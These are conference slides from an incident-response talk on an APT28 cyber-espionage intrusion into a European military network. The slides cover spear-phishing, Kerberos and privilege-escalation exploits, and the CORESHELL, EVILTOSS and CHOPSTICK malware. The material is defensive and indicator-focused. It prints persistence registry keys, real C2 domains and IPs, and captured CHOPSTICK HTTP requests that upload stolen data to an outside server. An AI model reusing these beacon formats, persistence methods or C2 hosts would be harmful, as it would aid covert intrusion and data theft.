SESSION ID:

CTT-W08

Evolving Threats:
dissection of a Cyber-
Espionage attack

Stefano Maccaglia

Advisory Consultant IR
RSA (a Division of EMC)

#RSAC

Who I Am

#RSAC

 I prefer not to talk too much about myself… 

 Let just say I am Advisory Consultant at RSA IR

 I am an Incident Responder with deep knowledge of malware and network 

analysts 

 I have started my career in 1997

 I have worked for several top 100 companies

 Before that I have been a cracker in Europe «underground scene» of Amiga and 

PCs.

Agenda
What we discuss today

#RSAC

 Today I would introduce a case I am still working on.

 The case is related to Military Sector, and it has been recorded with minimal 

differences in several EU military environments.

 The details of the attack are under strict NDA, but with slight modifications I have 

the chance to share the most important details about the attacker strategies, tactics 
and tools used.

 The case is interesting for several reasons that we will discuss today.

 The triage is still going on.

The adversary
APT28

#RSAC

 The attack has been attributed to APT Group 28, also known as “Sofacy” or 

“Sednit”. I will call it “APT28” from now on.

 APT28 group believed to have been in operation since 2007 and has been 

identified in several attacks that have targeted Eastern European governments, 
military and security-related organizations including the North Atlantic Treaty 
Organization (NATO).

 The group uses a complex set of tools and strategies to put a foothold in an 

environment and to control and steal interesting data.

 Several sources consider APT28 a group of CyberMercs based in Russia.

The target: the moat without water
How to develop a good network segmentation and be breached

#RSAC

 The attack has targeted a military environment in EMEA region.

 The environment has born segmented, with several layer of controls to preserve 

confidentiality and integrity of exchanged and stored data.

 The segmentation separates the network in several layers with different level of 

“trust”.

 Any operator receives a badge and a smartcard to operate in the network.

 Communication from a lower to an higher layer of trust is blocked, instead 

communication from higher layer to a lower one are permitted.

 At the beginning of the investigation I discovered that the base lacks any real 

network visibility. The only network devices capable of analyzing streams were 
sporadic IDS and IPS placed in non strategic points.

The target: the moat without water
How to develop a good network segmentation and be breached

#RSAC

 The environment is a Microsoft AD Forest with a pyramidal structure.

• The root AD trusts several subdomains each with 

its proper set of AD servers.

• The forest is regulated with different level of trust.

• The «Secret» and «NATO» networks are physically 
separated entities were people can access only 
through dedicated machines.

• Under no circumstances a user from standard AD 

structure can access Secret networks.

The target: the moat without water
How to develop a good network segmentation and be breached

 Patching policies are 15 days behind Microsoft releases.

#RSAC

 All other applications are patched and upgraded based on internal CERT approval.

 The reason for the delay is due to the need to verify the consistency and the impact 

of upgrade/patch against production environment.

 During the investigation we have discovered that, in the Data Center, two AD 

servers related to trusted subdomains, were not properly patched since November 
2014 due to the swap from a maintenance contractor to another.

 The lack of the patch MS14-068 is a key to understand how deep and how hard 

they have been breached.

The Attack

#RSAC

The attack strategy
How they break-in

#RSAC

 The attack started from a targeted spear-phish campaign against the participants of 

the 2014 Farnborough Air Show.

 The attack has targeted 7 officials of Air Force (AM) and 2 official of the Navy (MM) 

the email domain source was: “militaryexponews[.]com”

 The attack exploit a Microsoft Word vulnerability (CVE-2015-2424).

 Only in two cases the attack completes successfully for the attacker.

 In seven cases, the exploit, despite successfully detonated, was not able to start the 

infection because the machines lack direct Internet access (proxy blocked 
connection attempts).

 The reconstruction of the first stage has been performed after the creation of a 

proper set of IOCs starting from the infected systems.

The Attack
Dissemination strategy

#RSAC

Spear 
phishing

Vector + 
First 
Dropper

Coreshell 
Dropper

First C&C 

HTTP POST 
message

Streams to 
external C2 or 
Dropzone

Second 
Stage 
backdoor 
download

(EVILTOSS)

EVILTOSS 
Execution

Malware 
beacons to 
C&C and 
sends stolen 
data

EVILTOSS 
can 
download 
CHOPSTICK 
TROJAN 
from C&C

Lateral 
movements 
and Exfil

CHOPSTICK 
allows the 
attacker to 
extend the 
control of 
the target

Complete 
control over 
target 
system

Attack Overview: End of First Wave

#RSAC

The infected hosts, during roaming in external sites, communicates with C2

Attacker

Main C2

Whenroaming theyconnectto C2.

Victim 1

Victim 2

microsofthelpcenter.info

Attempts to access C2

Blocked by proxy

Attempts to access C2

Base

Note: The repeated attempts to communicate externally from infected machines blocked 
by proxy have been considered «of no interest» for the SOC of the base. No other 
investigation or action has been taken, at time, against these machines.

The attack strategy
More patients to care about…

#RSAC

 To escalate the infection the attacker have used the OWA access of the stolen 

accounts to enumerate other potential victims for a new wave of targeted emails.

 Also, one of the officers has access to internal Sharepoint service and participates 

to boards were specific internal meetings and projects are discussed.

 With tailored messages published in Sharepoint board, the attacker has been able 

to sneak through the inner layers of the military infrastructure distributing the 
dropper.

 One lesson I learn from Sharepoint… 

it has a horrible Log format.

Attack Overview: End of Second Wave

#RSAC

Still under control

Still under control

Attacker

C2s

Victim 1

Victim 2

microsofthelpcenter.info
1oo7.net
176.31.112.10

Washington

Public WAN

Moskow

Kiev

Skopje

Addis Ababa

Base

Base hosts

The attack strategy
The infection evolution

#RSAC

 In this second wave of attack the adversary, knowing that the previous phase has 
not succeeded as planned due to access restriction with proxy and firewalls, has 
modified the dropper in order to work with internal proxy (with HTTP and SSL).

 The modification has insured the control of all successfully infected hosts.

IOC

Proxy

Test performed 
after collection of 
the dropper from 
original spear 
phising email

The attack strategy
The infection progression

#RSAC

 The attacker has now a significant set of standard Domain Users account.

 Not enough to pawn the infrastructure, but good enough as a starting point.

 Thanks to his backdoor, he can easily begin to extend his action to other systems.

 Lacking logs and network visibility, for that part, we can only speculate that he 

successfully identifies the vulnerable Navy subdomains by accessing Navy computers 
in the base.

 The victims have direct access to the abovementioned AD servers because they use 

them for standard authentication.

 APT28 at this point has breached AD servers, has collected domain admins 

credentials and has moved forward to the Root AD and the repositories where 
“interesting data” resides.

CVE 2014-6324
LOG IOC
 Windows Audit log showing the successful exploitation of the Kerberos Service.

#RSAC

• When looking at the Audit log, to 

understand the successful exploit we 
should compare the Security ID with 
the Account Name. 

These two should be identical.

• In this case, slightly modified from the 
original log, we can see the «Officer 
A» logging with the Security ID of 
«Administrator».

Pwning the core: CVE-2015-1701
AKA… «How to pwn your AD and live undetected»…

#RSAC

 The attacker has been able to exploit root AD Servers thanks to a unknown (initially) 

local privilege escalation vulnerability CVE-2015-1701. 

The attacker has 
exploited a callback in 
UserSpace.

Upon completion, the 
payload continues 
execution in UserMode
with the privileges of 
the System process.

Note: The technique has been reported by Microsoft thanks to the 
analyses carried out in this engagement…

The Incident

#RSAC

Patient Zero
How the victim discovers the problem
 The diplomatic representation in Addis Ababa is composed of few militaries and 

#RSAC

several diplomats connected to Internet with the standard VPN service from public 
networks (transit through the Base).  For that part, nobody has noticed the strange 
connections to the external C2s repeated each day.

 But for a specific task, the owner of the infected laptop has used a connection from 

a military outpost, tightly regulated in access time and permissions.

 Once connected, the computer has attempted to beacon to the C2s and the local 

network operator has identified the strange traffic signaling it to his superiors.

 The alert has escalated to the Army regiment which has started to investigate.

 The analysis performed has followed the traditional practice.

Patient Zero
What’s on Customer “Patient Zero” machine?

#RSAC

 The forensic analysis on the «Patient Zero» identified by the Customer showed
the following suspicious files and registry modifications, but no attempts to 
expand the focus of the investigation have been made.

Registry Keys and Values

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Network Identification Service\parameters\ServiceDll = C:\Windows\System32\netids.dll

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Network Identification Service\parameters\ServiceDllUnloadOnStop = 1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\ntsvcs = Network Identification Service

HKEY_LOCAL_MACHINE\software\microsoft\windowsNT\currentversion\svchost\ntsvcs\CoInitializeSecurityParam ➝ 1

Created

Modified

Yes

Yes

Yes

Yes

No

No

No

No

EVILTOSS backdoor

Patient Zero consequences
How the attacker reacted

#RSAC

 The Army has triaged the compromised system reinstalling the OS and applications 

and has close the case.

 As result of the triage, the attacker changes strategy for a while.

 APT28 has lowered the volume of his traffic and, for more than 20 days nothing

has been reported.

 The military was ready closed the case, but another anomaly has been founded

during a scheduled maintenance on a server in the base Data Center.

 Looking at the logs, they have discovered the presence of repeated accesses from 

ad Administrator account logging from an external IP address.

 The case has escalated quickly this time.

The Methodology

#RSAC

What we can bring to the table?

#RSAC

 I am part of RSA IR Team and our structured approach, developed from our

field experience is now tuned to face attacks like this one.

 Our approach leverages on “Actionable IoCs” and the support of tools that 
could easily integrate these IoCs to speedup the IR investigation process.

 This is a methodology and not a “method”, because it counts on procedures, 

analyses and evidences in a scientifically sounding approach. 

 To collect actionable IoCs we use a synergic approach that includes network 

and system visibility with log and malware analyses.

 It involves aggregation of IoCs and their classification to create a “Knowledge 
Base” of attacks, tools and strategies that could be “reused” in subsequent 
engagements to streamline the response and support the attribution.

The Methodology

Network 
visibility

Malware 
visibility

Incident 
surface.

#RSAC

System 
visibility

Network, system 
and log indicators.
Classification and 
attribution.

Triage planned from 
a tailored set of 
strategic actions.

Actionable IoCs
What our methodology suggests

 IR is an ongoing process that spawns on multiple areas.

#RSAC

Actionable IoCs
What our methodology suggests

#RSAC

 To operationalize the IoC you should develop, use and store it in a reusable logic.

Investigation: first step
 The Customer has initially escalated the problem to another team, but despite 

the efforts and a triage attempt, the result was not satisfactory.

#RSAC

 Few days after the triage they discover additional lateral movements in their

network.

 At this point the Customer called us.

 We notice, since the initial talk, that the Customer was lacking any network 
visibility and the investigation was performed without a structured approach.

No network visibility

No detailed analysis has
been performed initially

Limited quantity of 
historical logs

The initial investigation has
been limited to MD5 search
on Domain machines.

Zero Trust
Below zero trust…
 Following our advice to bring a network forensic tool in their environment (RSA 

#RSAC

Security Analytics) we have been able to ensure that, even after the «apparent» 
expulsion of the attacker, several machines were still infected.

Successful 
communication
recorded after 
expulsion/triage…

The «network 
visibility» has
offered also
the chance to 
proactively
monitor the 
occurrence of 
other malicious 
attacks.

Our investigation
Our approach tailored to the case
 We have rebuilt the investigation process from the scratch aiming to identify malicious 

#RSAC

behavior from the already collected samples to build optimal Network Forensic IOC and to 
apply them as a base to highlight further machines infected.

Integrated a Network 
Forensic Tool: RSA SA

Redefined Actionable 
IOCs at Network, System 
and Log level for different 
platforms and systems.

Refocused the malware 
analysis on all identified 
samples to identify 
Actionable IOCs.

Improved the triage 
strategy by moving from 
°seek & destroy° to a  
more strategic approach.

 Thanks to that we have been able to enumerate remaining infected machines and to unearth 
the “missing piece”: the Chopstick RAT that the original IR team was not capable of identify. 
We know, from experience, that APT28 uses Chopstick RAT for most interesting targets.

Attacker Tools

#RSAC

APT 28 Tools
APT 28 Tools seen in this investigation

#RSAC

 CORESHELL: This downloader is the evolution of the previous downloader of 

choice from APT28 known as “SOURFACE” (or “Sofacy”). This downloader, once 
executed, create the conditions to download and execute a second-stage 
(usually Eviltoss) from a C2. 

 EVILTOSS: This backdoor is delivered through CORESHELL downloader to gain 
system access for reconnaissance, monitoring, credential theft, and shellcode
execution. 

 CHOPSTICK: This is a modular implant compiled from a software framework that 

provides tailored functionality and flexibility. By far Chopstick is the most 
advanced tool used by APT 28.

 MIMIKATZ: Everyone of us knows this tool. In this case, this has been of 

devastating effects to completely compromise AD Forest.

APT 28 Tools
CORESHELL behavioral analysis
Coreshell was relatively easy to detonate, apart for some AntiVM checks before executing. 
The behavioral analysis has permitted to highlight several DNS connections:

#RSAC

The DNS requests aim to different external hosts.
The malware use a beacon mechanism based on 
HTTP POST  and a separate thread for 
instructions still in HTTP.
The User-Agent, as explained earlier, can be used
as IOC, at least for the oldest variants. 

Note: Latest version of CORESHELL uses the victim’s browser User-Agent 
making the IOC useless.

APT 28 Tools
CORESHELL ATTRIBUTION BY COMPARISON

#RSAC

The attribution has been 
performed in two ways: 
 by comparison, between the 
discovered samples and the 
public ones.

 by analysis, looking for 

indicators related to the date 
and time of compilation, the 
time zone, the language of 
the malware and its 
behaviour.

The dropped files have been verified
as well and compared between 
different droppers.

APT 28 Tools
EVILTOSS IOCs
 At system level the malware modifies the Registry in order to ensure persistence.

#RSAC

 It is dropped and executed, usually, from one of these folders:

EVILTOSS installation folder

%system%
%temp%
%commonprogramfiles%\System\

Registry Keys and Values

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Network Identification Service\parameters\ServiceDll = %EVILTOSS 
folder%<EVILTOSSNAME>.dll

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Network Identification Service\parameters\ServiceDllUnloadOnStop = 1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\ntsvcs = Network Identification Service

HKEY_LOCAL_MACHINE\software\microsoft\windowsNT\currentversion\svchost\ntsvcs\CoInitializeSecurityParam ➝ 1

download files from a remote computer and/or the Internet
run executable files
log keystrokes
send gathered information

Created

Modified

Yes

Yes

Yes

Yes

No

No

No

No

APT 28 Tools
EVILTOSS ATTRIBUTION BY COMPARISON

#RSAC

The attribution has been 
performed in two ways: 
 by comparison, between the 
discovered samples and the 
public ones.

 by analysis, looking for 

indicators related to the date 
and time of compilation, the 
time zone and the language 
of the malware discovered.

Also lateral movements have been 
verified in terms of timeframe of the 
log and hosts involved.

APT 28 Tools
EVILTOSS IOCs
 EVILTOSS and CORESHELL share a lot of commonalities, both in the 

#RSAC

communication mechanism and the obfuscation/encryption. I.E. both obfuscate 
strings that are decoded at runtime.

 EVILTOSS uses RSA encryption to encrypt data and send it through a HTTP 

POST message very similar to CORESHELL traffic:

Cont…

C2 ack for exfil

APT 28 Tools
CHOPSTICK
 CHOPSTICK is a Trojan family, written in C++ and built from a framework.

#RSAC

 It offers a diverse set of capabilities for different deployments.

 It collects detailed information from the host settings and it is aware of the presence 

of several security products.

 It may communicate with external servers using SMTP, HTTP or HTTPs.

 CHOPSTICK stores all collected information in a hidden file for temporary storage.

 It communicates with the C2 via Windows “mailslot”, not named pipes or sockets. 

 CHOPSTICK main executable creates a “mailslot” in Windows machines and acts as 
the mailslot server, while its code injected into the other processes acts as a client 
allowing the Trojan to access and steal any type of information. 

 The RC4 encryption used here also uses a 50 bytes static key plus four-byte random 

salt value.

APT 28 Tools
CHOPSTICK IOCs
 Looking at network traffic we discover that, after approximately 60 seconds of 

#RSAC

execution time, CHOPSTICK begins communicating with one of its C2 servers. 
Usually as in our sample the traffic was over HTTP: 

GET /find/?itwm=90QDFR9CWZckwkTPHr2GOUXPXI91A&from=yVVgOqV1UG&utm=HTXh&utm=9kV7L3Z&oprnd=Xjp1kKrDgAeFu&from=06&9u2J=nYruvlhMtXN5 
HTTP/1.1 

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*;q=0.8 

Accept-Language: en-us,en;q=0.5 

Accept-Encoding: gzip, deflate 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) 

Host: 198.105.125.74

 After sending an initial HTTP GET request it uploads the file contents of 

edg6EF885E2.tmp to the C2 server using HTTP POST requests. 

POST /open/?ags=bBz&ags=qVs5d0kGHtil&oprnd=6ZCuc7XQ&channel=gBDFmj_fJdNk9&itwm=HJxam7mDOyIBftJ6OwEQjGBzyjpQv HTTP/1.1 

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*;q=0.8 

Accept-Language: en-us,en;q=0.5 

Accept-Encoding: gzip, deflate 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) 

Host: 198.105.125.74 

Content-Length: 69 

Connection: Keep-Alive 

Cache-Control: no-cache EMo1MTmWmHwJAwHlezPSG5-SGWRYwQm6MbGxkYhvCv7-FRCezztd2UxRArSxP285WXg==

The attack strategy
IOC: C2 list
 Thanks to our structured approach we have been able to identify the C2s used by 
the attacker and with them, we have been able to enumerate infected hosts based 
on network communications.

#RSAC

URL

IP

Type

microsofthelpcenter.info

87.236.215.13

HTTP/HTTPS Main C2

driversupdate.info

46.19.138.66

1oo7.net

5.199.171.58

66.172.12.133

66.172.12.133

45.64.105.23

45.64.105.23

176.31.112.10

176.31.112.10

176.31.96.178

176.31.96.178

HTTPS C2

HTTPS C2

Coreshell C2

Coreshell C2

HTTPS C2

HTTPS C2

Note: The attacker has 
used different 
infrastructures for 
managing infected 
hosts.
Note: Some of the 
discovered C2s are in 
common with other 
attacks recorded against 
other military 
environments in EMEA.

The C2 list has confirmed the attribution and has paved the way 
for a more structured approach for Triage

Incident Timeline and Stats
Results of our methodology Vs previous results obtained by the Customer

#RSAC

Peak of attack distribution

Initial 
Spearphishing

First Phase of 
Attack

Patient Zero

300

250

200

150

100

50

0

Oct‐14 Nov‐14 Dec‐14 Jan‐15

Feb‐15 Mar‐15 Apr‐15

May‐15

Jun‐15

Final triage managed by 
our Team

Last record of infected 
machine

Jul‐15

Aug‐15

Sep‐15

Remediation
APT28

Initial massive 
triage

First time our 
methodology has applied

APT28

Remediation

Conclusion
What I can suggest

#RSAC

 It is extremely valuable to build an internal Knowledge base about incidents and 

attacks recorded and published and to extract IOCs from these incidents.

 It is extremely useful to refocus the IR procedures dividing them in four areas:

 Network Forensic
 System Forensic
 Log Analysis
 Malware Analysis

Actionable IOCs

Rapid Incident reaction
Proactive Management

 It could be extremely important to streamline the IR procedures by transforming IOCs 
to actionable IOCs, that means to evaluate and define which IOC can be reused and 
which one is limited to a specific attack or event.

 It is important to drill and to give IR personnel the chance to learn how to build, use, 

extract, evaluate and properly store Actionable IOCs. 

Conclusion
What our methodology suggests

#RSAC

You should not approach IR 
operations in a unstructured 
way.

You should ensure proper 
«visibility» to all IR fields.

You should avoid to manage 
the Incident through «work 
arounds» and «shortcuts»

You should avoid to rely only
on technologies

You should keep your IR 
capabilities updated

Once formalized, you should 
use IoCs as key element to 
evaluate the attack surface

You should organize the 
triage in a strategic approach. 

#RSAC

EMC, RSA, the EMC logo and the RSA logo are trademarks of EMC Corporation in the U.S. and other countries. 

